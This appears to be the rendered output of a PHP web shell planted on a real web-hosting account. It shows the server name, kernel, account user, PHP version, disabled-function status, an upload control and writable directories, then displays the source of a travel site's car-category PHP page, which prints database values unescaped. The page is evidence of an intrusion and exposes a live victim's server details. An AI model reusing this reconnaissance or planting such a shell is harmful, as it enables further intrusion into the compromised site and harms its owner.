KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache
System : Linux p3plzcpnl507073.prod.phx3.secureserver.net 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64
User : swg98tjyzel1 ( 5098476)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /home/swg98tjyzel1/public_html/bityatra.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/swg98tjyzel1/public_html/bityatra.com/car-category.php
<?php
define('SECURE_ACCESS', true); // This line is required before including config.php
include("config.php");
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="description" content="" />
    <meta name="keywords" 
    content="" />
    <meta name="author" content="Set Private Limited" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!--[if IE]><meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'><![endif]-->
    <title>Bityatra, Online Tour packages, Hotel booking, Holiday boooking & Car Rental </title>


    <!------------------------------------------
      Main CSS File
    <------------------------------------------>

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/font-awesome.min.css">

    <link rel="stylesheet" href="css/menu.css">
    <link rel="stylesheet" href="css/custom-animation.css">
    <!-- Style CSS -->
    <link rel="stylesheet" href="css/style.css">
    <!-- Responsive CSS -->
    <link rel="stylesheet" href="css/responsive.css">

    <!-- Favicon -->
    <link href="images/favicon.png" rel="shortcut icon" type="image/png">
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=AW-17582356210"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'AW-17582356210');
</script>
  </head>

<body>

    <div class="preloader"></div>

    <!-- Start Page Wrapper  -->
    <div class="page-wrapper">

 <?php include"header.php"; ?>
        <!-- Inner Section Start -->
          <section class="inner-area parallax-bg" data-background="images/bg/px-3.jpg" data-type="parallax" data-speed="3">
            <div class="container">
              <div class="section-content">
                <div class="row">
                  <div class="col-12">
                    <h4>Car Category</h4>
                    <p>Home <a href="#">Car Category</a></p>
                  </div>
                </div>
              </div>
            </div>
          </section>
        <!-- Inner Section End -->

        <!-- Special Places Section Start -->
        <section class="special-places-sec pb-50">
            <div class="container">
                <div class="row grid-mb">
                      <?php
					$s=mysqli_query($con,"select * from car_category order by id DESC");
					$a=1;
					while($r=mysqli_fetch_array($s))
					{
					
					?>
                
                    <div class="col-xl-4 col-lg-6 col-md-6">
                        <div class="special-packages">
                            <div class="thumb">
                                <img src="upload_image/<?php print $r['image']; ?>" alt="" width="350" height="215">
                                <div class="content">
                                            <h4 style="color: #255669;font-size: 15px;font-weight: 700;letter-spacing: 0.3px;margin-bottom: 8px;text-transform: uppercase;"><?php print ucwords($r['name']);?></h4>
                                            
<a class="btn-theme" href="car-rental.php?id=<?php print $r['id'];?>">View</a>                                             
                                        </div>
                            </div>
                            
                        </div>
                    </div>
                    
                     <?php $a++; } ?>
                    
                    
                    
                    
                    
                </div>

                
            </div>
        </section>
        <!-- Special Places Section End -->

 <?php include"footer.php"; ?>

TitusBoTz-MD - 2021